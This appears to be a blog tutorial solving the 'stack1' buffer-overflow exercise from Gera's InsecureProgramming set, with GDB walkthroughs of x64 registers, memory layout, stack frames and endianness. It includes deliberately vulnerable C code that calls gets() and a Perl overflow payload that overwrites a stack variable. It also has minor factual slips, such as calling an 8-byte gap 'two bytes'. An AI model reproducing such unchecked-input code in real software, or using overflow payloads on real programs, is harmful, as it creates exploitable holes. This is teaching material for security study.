Stack Warmup 1

by gr0k

29 August 2018

stack1.c is the first of the Stack Warmup Exercises. This guide will walk you through the buffer overflow process and explain the details behind what’s happening. I ran all of the following on a 64-bit Ubuntu 18.04 box.

Source Code Review

We’ll start with a review of the source code to get an idea of what’s happening and what we need to do. If you’re coming here directly, check out my Getting Started walkthrough to get up and running.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// stack1-stdin.c                               
// specially crafted to feed your brain by gera

#include <stdio.h>

int main() {
  int cookie;
  char buf[80];

  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);

  if (cookie == 0x41424344)
  printf("you win!\n");
}

First two variables are declared, cookie and buf. cookie is defined as an int variable, and buf is an array of 80 characters.

Line 10 has a print statement with two format parameters. Format parameters are written with a percent sign and a letter which specifies how the program should display the variable. In this case, the x means to print as hex. The numbers after the % control the width of the output. The variables the program prints are included after the output string. In the C programming language, & is the ‘address-of’ operator, and means get the memory address for the variable listed. This line will print out the memory address for the buf and cookie variables. Wikipedia has more information about C printf format strings here.

Line 11 calls the gets function. From the Open Group Library, the gets function operates as follows:

The gets() function shall read bytes from the standard input stream, stdin, into the array pointed to by s, until a <newline> is read or an end-of-file condition is encountered. Any shall be discarded and a null byte shall be placed immediately after the last byte read into the array.

char *gets(char *str)

The char *gets means the gets function returns a pointer to a character. Upon successful execution, gets will return a pointer to str. The (char *str) means that the function takes one parameter, a pointer to a string. This is where the function will write the input from stdin. For more on reading C functions, the guides here and here are useful. The cdecl command line tool or web app are also useful for decoding complicated C declarations.

One thing to notice in the description and function syntax above is that the only parameter for gets is a destination for the input. gets will continue reading data until it receives a newline character or end-of-file condition. There are no parameters that specify how much data should be written to the buffer, gets will copy it all into the specified destination, regardless if it’s big enough. This is what makes gets so dangerous to use, and what we’re going to exploit for the buffer overflow.

Line 14 will print “you win!” if the value of cookie is 0x41424344. You’ll notice there is no point in this code where you can set the value of cookie. We need to either figure out how to set the cookie variable in order to successfully execute the if statement, or find some other way to print “you win!”

Running the Program

If you followed the Setup Guide, you can run the stack1 binary from the InsecureProgramming/bin directory with ./stack1.

gr0ked (master) bin $ ./stack1
buf: a091ad20 cookie: a091ad7c
AAAAA
gr0ked (master) bin $

As discussed above, the memory addresses for the buf and cookie variables are printed, the program takes input from the user, and then exits.

Examining the Program’s Internals

Having run the program, we can see the memory addresses for the buf and cookie variables displayed in hexadecimal. Knowing the buffer variable was declared as 80 bytes long, we might expect the difference between the two variables to equal 81 bytes, or one more than the size of our buffer. In other words, we might guess that the cookie variable is stored immediately after the buffer variable. We can check this easily with some math in GDB. (If you’re new GDB, you can check out my quick walkthrough here).

Looking at the addresses, you’ll note that the cookie address 0xa091ad7c is greater than the buffer’s address, 0xa091ad20. (If you’re unfamiliar with hex, you can confirm this by converting the values to decimal with this calculator). By subtracting the cookie variables address from the buffer’s address, we can see how much space is between the two variables:

(gdb) p 0xffffddac - 0xffffdd50
$1 = 92

That’s weird. We declared the buffer to be 80 bytes long, but it looks like there are 92 bytes separating the two variables. Let’s explore why.

If we disassemble the main function, we can see what the assembly instructions are directing the CPU to do:

(gdb) disass /s main
Dump of assembler code for function main:
./exercises/stack1.c:
6	int main() {
   0x00000000004005b6 <+0>:	push   rbp
   0x00000000004005b7 <+1>:	mov    rbp,rsp
   0x00000000004005ba <+4>:	sub    rsp,0x60

7	    int cookie;
8	    char buf[80];
9
10	    printf("buf: %p cookie: %08x\n", &buf, &cookie);
   0x00000000004005be <+8>:	lea    rdx,[rbp-0x4]
   0x00000000004005c2 <+12>:	lea    rax,[rbp-0x60]
   0x00000000004005c6 <+16>:	mov    rsi,rax
   0x00000000004005c9 <+19>:	mov    edi,0x400694
   0x00000000004005ce <+24>:	mov    eax,0x0
   0x00000000004005d3 <+29>:	call   0x400480 <printf@plt>

These first three assembly instructions, push, mov, and sub, are called the function prologue. The function prologue does the work of the initial setup of memory for a function in a program. To better understand what’s happening, I’m going to take a detour to explain some parts of the CPU and how memory works.

CPU Architecture

The CPU uses special memory located directly on it called registers to store memory addresses, hold data for operations, and track the results of these operations. The size of a computer’s register is determined by the system’s “word size.” The word size of a computer is the maximum number of bits its CPU can process at once. On an x86 computer system, the word size is 32 bits, while on x64 systems the word size is 64 bits.

There are important differences between register names for 64- and 32-bit systems. All 64-bit registers start with the letter “r,” (except for the eflags register), while all 32-bit registers start with the letter “e.” The naming convention is a result of the way CPUs were developed over time. For a more in depth look, you can read this Stack Exchange answer about register naming conventions.

The registers for x64 based systems are as follows:

Registers	Name (Common Purpose)
rax	Accumulator (math operations)
rbx	Base (pointer to data)
rcx	Counter (track loop iterations)
rdx	Data (math operations)
rsi	Source Index (pointer to source memory address for stream operations)
rdi	Destination Index (pointer to destination memory address for stream operations)
rbp	Base Pointer (points to base of stack frame)
rsp	Stack Pointer (points to top of stack)
r8 - r15	General Purpose registers
rip	Instruction Pointer
eflags	Status Flags
cs, ss, ds, es, fs, gs	Segment Registers

Viewing Registers in GDB:

(gdb) i r
rax            0x7fffffffdd50	140737488346448
rbx            0x0	0
rcx            0x7ffff7dd18e0	140737351850208
rdx            0x7ffff7dd3790	140737351858064
rsi            0x602423	6300707
rdi            0x7fffffffdd53	140737488346451
rbp            0x7fffffffddb0	0x7fffffffddb0
rsp            0x7fffffffdd50	0x7fffffffdd50
r8             0x602424	6300708
r9             0x0	0
r10            0x57	87
r11            0x246	582
r12            0x4004c0	4195520
r13            0x7fffffffde90	140737488346768
r14            0x0	0
r15            0x0	0
rip            0x4005e9	0x4005e9 <main+51>
eflags         0x246	[ PF ZF IF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0

While x64 system registers all begin with “r,” you can access the lower order bits of these registers by using the “old” register names as shown below. To address bits 0-31, you can use eax, edx, etc. For bits 0-15, you can use ax, dx, etc. This was implemented to ensure backwards compatibility with programs written for older architectures.

For the 8 bit registers, you can independently access the low (0-7) or high (8-15) order bits with “l” and “h” respectively. This convention doesn’t hold for the 16- and 32-bit registers, there is no such thing as “high” EAX.

Computer Memory

Absolutely everything about the operation of a computer comes down to memory management. While the CPU does all the number crunching, all of the instructions it follows and the data it manipulates are stored in Random Access Memory, or RAM (assuming no memory has been swapped to disk, but that’s beyond the scope of this walkthrough).

When an executable gets loaded from disk into RAM, the binary instructions tell the CPU how to set up memory for the program. Most programs have the following segments in memory, with the segments starting at low addresses and moving to higher ones:

Code Segment
Data Segment
BSS Segment
Heap
Stack

When describing how memory is laid out, diagrams will be depicted in one of two ways: with low addresses shown on top of the diagram, or low addresses shown on the bottom. I will use the former convention, because I think it makes it easier to visualize what happens during buffer overflows.

This is what a program in memory looks like:

Lower Memory Addresses
----------------------
|     code segment   |  <- Machine Instructions     
|--------------------|
|     data segment   |  <- Initialized global variables
|--------------------|
|      bss segment   |  <- Uninitialized global variables
|--------------------|
|        heap        |  <- Dynamically allocated memory
|--------------------|
|          |         |  Heap grows to higher addresses
|          v         |
|                    |
|          ^         |  Stack grows towards lower addresses
|          |         |
|--------------------|
|        stack       |  <- Function + Local variable storage
|--------------------|
Higher Memory Addresses

We can see the differences in addresses by looking at the programs memory with gdb. We’ll use the following program, mem_segments.c, to explore this. Save this to a file and compile it with gcc -g -o mem_segments mem_segments.c. We’ll run the program in gdb and look at its memory segments.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#include <stdio.h>
#include <stdlib.h>

int number_init = 10;
int number_uninit;

int function1(int a, int b);

int main() {
    char *ptr1;
    char *ptr2;
    int mem_block = 50;

    int var_a = 10;
    int var_b = 20;
    int result;

    printf("Hello, world!\n");

    ptr1 = malloc(100);
    ptr2 = malloc(mem_block);

    free(ptr1);
    free(ptr2);

    result = function1(var_a, var_b);
    printf("Result: %d\n", result);

    return 0;
}

int function1(int a, int b) {
    int var1 = 10;
    int answer;

    char var2[2] = "A";
    char *var_ptr;
    var_ptr = var2;

    printf("Letter A as Hex character: 0x%x\n", *var_ptr);

    answer = a + b + var1;

    return answer;
}

When you compile and run the program, you should get the following output:

gr0ked Desktop $ gcc -g -o mem_segments mem_segments.c
gr0ked Desktop $ ./mem_segments
Hello, world!
Letter A as Hex character: 0x41
Result: 40

Take note of what the capital letter “A” looks like as a hexadecimal character. We’ll need that information later.

Code Segment

The code segment, or text section, contains the executable instructions of a program. As a program executes, the instruction pointer (rip on x64, eip on x86), will point to the memory address of the next instruction to execute. We can see below the machine instruction currently pointed to by rip is located at a low memory address of 0x40066e. We can also see the next instructions that the CPU will execute and their memory addresses.

gr0ked Desktop $ gdb -q mem_segments
Reading symbols from mem_segments...done.
(gdb) break main
Breakpoint 1 at 0x40066e: file mem_segments.c, line 12.
(gdb) run
Starting program: /home/gr0ked/Desktop/mem_segments

Breakpoint 1, main () at mem_segments.c:12
12	    int mem_block = 50;
(gdb) x/3i $rip
=> 0x40066e <main+8>:	mov    DWORD PTR [rbp-0x20],0x32
   0x400675 <main+15>:	mov    DWORD PTR [rbp-0x1c],0xa
   0x40067c <main+22>:	mov    DWORD PTR [rbp-0x18],0x14

Data and bss segments

The data (initialized variables) and bss (uninitialized variables) sections are where global data is stored. When a global variable is declared in a program and given a starting value, such as int number = 10, that variable would be stored in the initialized area. If the variable is not assigned a starting value, such as int number, it gets stored in the uninitialized section.

(gdb) x/xw &number_init
0x601058 <number_init>:	0x0000000a
(gdb) x/xw &number_uninit
0x601060 <number_uninit>:	0x00000000

The variables number_init and number_uninit are global because they are declared outside of any function. As a result, any function in this program can see and manipulate those values.

The two variables are located at 0x601058 and 0x601060. Because the size of these sections won’t change during execution, unlike the stack and the heap memory segments, they can be placed closely next to each other, which is why there is only two bytes separating these variables. This thread on Stack Overflow is useful for understanding the historical reasons for having these two different segments.

Heap

The heap is for dynamically allocated memory. This allows programmers to assign memory for variables when they don’t know initially how much they need with the memory allocation function malloc(). malloc() takes a number specifying how much memory is requested, and returns a pointer to the allocated block of memory. In mem_segments.c we requested two blocks of memory, one by specifying a set number of bytes, and one with an int variable.

(gdb) break 22
Breakpoint 2 at 0x4006ac: file mem_segments.c, line 22.
(gdb) c
Continuing.
Hello, world!

Breakpoint 2, main () at mem_segments.c:23
23	    free(ptr1);
(gdb) x/xw ptr1
0x602420:	0x00000000
(gdb) x/xw ptr2
0x602490:	0x00000000

When we examine the addresses of the pointers, you can see how the second pointer has a higher memory address than the first, showing how the heap is growing towards larger addresses. When we are done with the memory, we use free() to release the memory back to the computer.

You may have noticed when we inspected the memory of the pointers that we didn’t prefix the variable with an & like we have before. Pointers are powerful variables but they have some idiosyncrasies that are not obvious at first glance. If we had used the address-of operator, we would have gotten back the memory address of the pointer variable itself, which is located on the stack. However, because we were interested in the memory address the pointer was actually pointing to, we leave off the & operator.

Stack

The last memory section to look at is the stack. The stack is what allows us to use functions to modularize our code. It is known as a “Last In, First Out” (LIFO) data structure. You can think of it like the spring loaded plate dispensers at a buffet restaurant, the last plate added to the stack will be the first plate taken off. Adding data to the stack is done with a push instruction, while taking data off the stack is done with a pop instruction.

The data for each of a program’s functions is stored in what’s called a “stack frame”. The CPU tracks the start and end of the stack frame with the rbp and rsp registers. rbp points to the bottom of the frame located at higher memory addresses, while rsp points to the top of a frame at a lower address. Stack frames only exist when their function is called. For our example code, mem_segments.c, if you set a breakpoint at main, there will be no stack frame for the function1() function until after it is called on line 26.

The stack starts at very high memory addresses and grows towards lower memory addresses. The image below shows what the stack frame for mem_segments.c looks like for the main function. Each block of memory shown below represents 4 bytes. Because this is a 64-bit architecture, the pointers require 8 bytes (64 bits) of storage, which is why they are shown across two rows.

Stack Layout

While data can only be added or removed from the top of the stack with push and pop, we can still manipulate the data stored on the stack by referencing variable locations relative to the base pointer. The image above shows how this is done, with variables being referenced as offsets from rbp. The code block below shows what this looks like in gdb. The last three instructions show the variables mem_block, var_a, and var_b being initialized with the values 50 (0x32), 10 (0xa), and 20 (0x14).

(gdb) disass main
Dump of assembler code for function main:
   0x0000000000400666 <+0>:	push   rbp
   0x0000000000400667 <+1>:	mov    rbp,rsp
   0x000000000040066a <+4>:	sub    rsp,0x20
   0x000000000040066e <+8>:	mov    DWORD PTR [rbp-0x20],0x32
   0x0000000000400675 <+15>:	mov    DWORD PTR [rbp-0x1c],0xa
   0x000000000040067c <+22>:	mov    DWORD PTR [rbp-0x18],0x14

Below is what the stack frame image from above actually looks like when viewed in gdb. Each row shows 16 bytes of memory. You can see var_a is stored at address 0x7fffffffddc4 and currently contains the value 0. It won’t contain the value 50 until the assembly instruction mov DWORD PTR [rbp-0x20],0x32 is executed. The variable is located 0x1c bytes below rbp, as shown below.

(gdb) i r rsp rbp
rsp            0x7fffffffddc0	0x7fffffffddc0
rbp            0x7fffffffdde0	0x7fffffffdde0

(gdb) x/16xw $rsp
0x7fffffffddc0:	0x00400770	0x00000000	0x00400570	0x00000000
0x7fffffffddd0:	0xffffdec0	0x00007fff	0x00000000	0x00000000
0x7fffffffdde0:	0x00400770	0x00000000	0xf7a2d830	0x00007fff
0x7fffffffddf0:	0x00000000	0x00000000	0xffffdec8	0x00007fff

(gdb) x/xw &var_a
0x7fffffffddc4:	0x00000000

(gdb) x/xw $rbp-0x1c
0x7fffffffddc4:	0x00000000

As you examine the memory addresses of a program in GDB, one thing to keep in mind is these addresses are all virtual memory addresses. The operating system abstracts the computer’s physical memory for each program, allowing each program to think it has all of the physical RAM available for its own use. Although two programs may show a variable is stored at the same memory address when viewed in GDB, the operating system translates the programs virtual memory address to the actual physical address in RAM. This translation process is beyond the scope of what’s needed for these walkthroughs, so I won’t go into it here.

Now that we understand memory layout and stack frames we can discuss the function prologue and stack frame construction.

Stack Frame Construction

(gdb) disass main
Dump of assembler code for function main:
	... OUTPUT TRIMMED ...
   0x00000000004006c4 <+94>:	mov    edx,DWORD PTR [rbp-0x18]
   0x00000000004006c7 <+97>:	mov    eax,DWORD PTR [rbp-0x1c]
   0x00000000004006ca <+100>:	mov    esi,edx
   0x00000000004006cc <+102>:	mov    edi,eax
   0x00000000004006ce <+104>:	call   0x4006f1 <function1>
   0x00000000004006d3 <+109>:	mov    DWORD PTR [rbp-0x14],eax
   0x00000000004006d6 <+112>:	mov    eax,DWORD PTR [rbp-0x14]
	... OUTPUT TRIMMED ...

function1() gets called on line 26 of mem_segments.c. This translates to the call assembly instruction seen above, call 0x4006f1 <function1>. When executed, call pushes the address of the next instruction, 0x00000000004006d3, onto the stack. This pushed address is referred to as the “return address.” The return address is the memory address of the instruction the CPU will execute once the called function ends. After the push, the instruction pointer jumps to the address specified in the call, 0x4006f1, and begins executing the instructions in the function.

function1() is called with two parameters, var_a and var_b. On older architectures, function parameters would get pushed to the stack in reverse order, and they would be referenced as offsets from rbp. This still happens in certain situations, but with additional registers available on x64 CPUs, parameters can be passed to functions in registers. This is more efficient since the CPU doesn’t have to waste instructions or execution time storing extra data on the stack it doesn’t need to. Function parameters are passed to the callee function in the registers rdi, rsi, rdx, rcx, r8, and r9. You can see the setup for this occurring with the four mov instructions before the call instruction. For more information about this calling convention, you can read about the System V Application Binary Interface (ABI) from OS Dev here.

We can see the pushed return address after the call instruction in gdb below.

(gdb) break function1
Breakpoint 4 at 0x4006ff: file mem_segments.c, line 32.
(gdb) c
Continuing.
Hello, world!

Breakpoint 4, function1 (a=10, b=20) at mem_segments.c:32
32	int function1(int a, int b) {

(gdb) i r rbp
rbp            0x7fffffffddb0	0x7fffffffddb0

(gdb) x/4xw $rbp
0x7fffffffddb0:	0xffffdde0	0x00007fff	0x004006d3	0x00000000

Examining the memory pointed to by the base pointer, we can see the return address, 0x004006d3, on the stack. This return address is at [rbp+0x8], as shown in the stack frame diagram. We can also see the saved base pointer from the previous stack frame, 0x00007fffffffdde0. As seen above though, it appears that it’s split in half, and the two halves have been reversed. In order to understand what’s happening, we need to discuss the concept of “endianness.”

Endianness

When writing numbers, we can write them in two different ways. We’ve decided to write them from left to right, with digits further left representing greater powers of ten. In other words, when we see the number 123, we understand it to mean one hundred, two tens, and three ones. We could have just as easily decided to reverse that, and have the right most digits represent greater powers of ten. Reversed, we would read it as three hundreds, two tens, and one one.

This same convention applies to data stored in computer memory. Unlike our numbering system, which has agreed on one convention, computers can store bytes both ways. The way bytes are stored in memory is referred to as its “endianness,” a term that comes from Gulliver’s Travels, where some of the characters argued over whether an egg should be cracked open from the “big end” vs the “small end.”

Most computers today use little endian architecture, which is equivalent to reading numbers from right to left. Data is stored with the least significant bit in the lowest memory address. In comparison, when data is sent across a network link, it’s often sent with the most significant bit first. If the bits are interpreted in the wrong order, the data will be misunderstood, as shown in the example with the number 123. There are other computer architectures that use big endian, but all Intel and AMD systems use little-endian.

We can see the effect in memory here:

(gdb) x/8xb $rbp
0x7fffffffddb0:	0xe0	0xdd	0xff	0xff	0xff	0x7f	0x00	0x00

(gdb) x/xg $rbp
0x7fffffffddb0:	0x00007fffffffdde0

When we print the data at rbp as individual bytes, the bytes representing the smallest power of two is located at the lowest memory address. When we display it as a giant word though, the bytes are displayed in reverse order as you would expect them to be. This is because gdb understands that the data is stored in memory in little-endian format, and displays the bytes in the proper order when they are printed as a whole unit. If you print memory as words or giants, you just have to remember that even though gdb shows it to you in proper, big endian format, the first byte at memory address 0x7fffffffddb0 is really 0xe0, not 0x00.

We can see the same impact when we display the base pointer as words:

(gdb) x/2xw $rbp
0x7fffffffddb0:	0xffffdde0	0x00007fff

gdb is displaying the hex values in the proper order for each set of four bytes, with the most significant byte on the left to least significant on the right. Just remember that the bytes are still stored in reverse in memory.

When looking at eight byte variables in memory, its easier to print them as giants, where as when looking at four byte variables, its easier to print them as words. I’ll print in the format that makes the most sense for the data being viewed.

Stack Frame Construction Continued

Now that we understand how to properly read the memory addresses in gdb, we can complete our understanding of stack frame construction.

The first step is when the function gets called. The return address is pushed to the stack and the instruction pointer jumps to the first instruction of the function. When something is pushed to the stack, the stack pointer is first decreased by 8 bytes (4 on an x86 system), and then the data is pushed to the new address rsp is now pointing to. You can see below how rsp is 8 bytes lower after function1() is called from main().

(gdb) run
Starting program: /home/gr0ked/Desktop/mem_segments

Breakpoint 1, main () at mem_segments.c:12
12	    int mem_block = 50;
(gdb) i r rsp rbp
rsp            0x7fffffffddc0	0x7fffffffddc0
rbp            0x7fffffffdde0	0x7fffffffdde0

(gdb) c
Continuing.
Hello, world!

Breakpoint 6, function1 (a=0, b=6299648) at mem_segments.c:32
32	int function1(int a, int b) {

(gdb) i r rsp rbp
rsp            0x7fffffffddb8	0x7fffffffddb8
rbp            0x7fffffffdde0	0x7fffffffdde0

The second step is the execution of the function prologue which sets up the required stack area for the stack frame. When the mem_segments.c source code is compiled, the compiler determines how much memory on the stack is needed for each function. The first instructions of the function then set up the frame.

(gdb) break *0x00000000004006f1
Breakpoint 6 at 0x4006f1: file mem_segments.c, line 32.

(gdb) run
Starting program: /home/gr0ked/Desktop/mem_segments

Breakpoint 1, main () at mem_segments.c:12
12	    int mem_block = 50;
(gdb) c
Continuing.
Hello, world!

Breakpoint 6, function1 (a=0, b=6299648) at mem_segments.c:32
32	int function1(int a, int b) {
(gdb) x/3i $rip
=> 0x4006f1 <function1>:	push   rbp
   0x4006f2 <function1+1>:	mov    rbp,rsp
   0x4006f5 <function1+4>:	sub    rsp,0x30

First the main function’s base pointer is pushed to the stack. Then the stack pointer is moved to the base pointers current address. The stack pointer is then moved to a lower address by the amount of space necessary as determined by the compiler. In the example above, its 0x30 bytes. When the function prologue is done, we’ll now have a new stack frame on the stack.

The image below shows the two stack frames:

Function Stack Frame

And the two stack frames in gdb:

(gdb) i r rsp rbp
rsp            0x7fffffffdd80	0x7fffffffdd80
rbp            0x7fffffffddb0	0x7fffffffddb0

(gdb) x/32xw $rsp
0x7fffffffdd80:	0x00602420	0x00000000	0x00602000	0x00000000
0x7fffffffdd90:	0x0000000d	0x00000000	0x00000000	0x00000000
0x7fffffffdda0:	0xffffdde0	0x00007fff	0x00400570	0x00000000
0x7fffffffddb0:	0xffffdde0	0x00007fff	0x004006d3	0x00000000
0x7fffffffddc0:	0x00000032	0x0000000a	0x00000014	0x00000000
0x7fffffffddd0:	0x00602420	0x00000000	0x00602490	0x00000000
0x7fffffffdde0:	0x00400770	0x00000000	0xf7a2d830	0x00007fff

Exploitation

Now that we understand a program’s memory layout, we can understand why the buf and cookie variables are 92 bytes apart instead of 81.

In order to make computers more efficient, data needs to be aligned along “boundaries” so the CPU can easily move chunks of data into the register. If data isn’t aligned properly on the stack, there will be increased overhead whenever alignment was needed. With limited memory space no longer an issue as it was in the early days of computing, computers can be more efficient if data is aligned on the stack. You can read more about alignment at this Stack Overflow answer.

When we look at the variables in stack1.c, we see we need 80 bytes for our buffer and 4 bytes for our cookie, for a total of 84 bytes. The closest 16 byte boundary that will accommodate 84 bytes is 96. This is why earlier we saw the two variables were 92 bytes apart.

Boundary Alignment

Now that we know how far apart the variables are and that gets() does not limit user input, we can craft our buffer overflow. We’ll need 92 bytes to reach the cookie variable, and then 4 additional bytes to overwrite it.

If you recall from the mem_segments.c program, hexadecimal representation of the capital letter “A” is 0x41. When we did the source code review, we saw that the cookie variable needed to equal 0x41424344. Knowing that 0x41 is “A,” you can safely assume 0x42 is “B,” etc. If you ever need to check what the hex (and decimal) values are for any character, you can view the manual page for ascii characters on the command line with man ascii.

Now that we know what our input needs to be, we can use Perl to generate our string:

gr0ked (master *) bin $ perl -e 'print "A"x92 . "ABCD"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCD

gr0ked (master *) bin $ gdb -q stack1
Reading symbols from stack1...done.
(gdb) break 12
Breakpoint 1 at 0x4005e9: file ./exercises/stack1.c, line 12.

(gdb) run
Starting program: /home/gr0ked/InsecureProgramming/bin/stack1
buf: ffffdd50 cookie: ffffddac
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCD
Breakpoint 1, main () at ./exercises/stack1.c:13
13	    if (cookie == 0x41424344)
(gdb) c
Continuing.
[Inferior 1 (process 18173) exited normally]

Nothing. We didn’t get “you win!”. Let’s look at why not.

(gdb) run
Starting program: /home/gr0ked/InsecureProgramming/bin/stack1
buf: ffffdd50 cookie: ffffddac
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCD

Breakpoint 1, main () at ./exercises/stack1.c:13
13	    if (cookie == 0x41424344)

(gdb) x/xw &cookie
0x7fffffffddac:	0x44434241

(gdb) x/24xw &buf
0x7fffffffdd50:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdd60:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdd70:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdd80:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdd90:	0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdda0:	0x41414141	0x41414141	0x41414141	0x44434241

We can see at breakpoint 1, cookie has to equal 0x41424344. When we look at memory, we see the buffer has overflowed into cookie with 0x44434241. This, as you may have guessed, is because of the endianness. We need to reverse the letters in our buffer.

gr0ked (master *) bin $ perl -e 'print "A"x92 . "DCBA"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gr0ked/InsecureProgramming/bin/stack1
buf: ffffdd50 cookie: ffffddac
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCBA

Breakpoint 1, main () at ./exercises/stack1.c:13
13	    if (cookie == 0x41424344)
(gdb) c
Continuing.
you win!
[Inferior 1 (process 18198) exited normally]

You win. Well done.

hack -h

A technical guide with a focus on computer security. Your walkthrough to Penetration Testing and Computer Defense.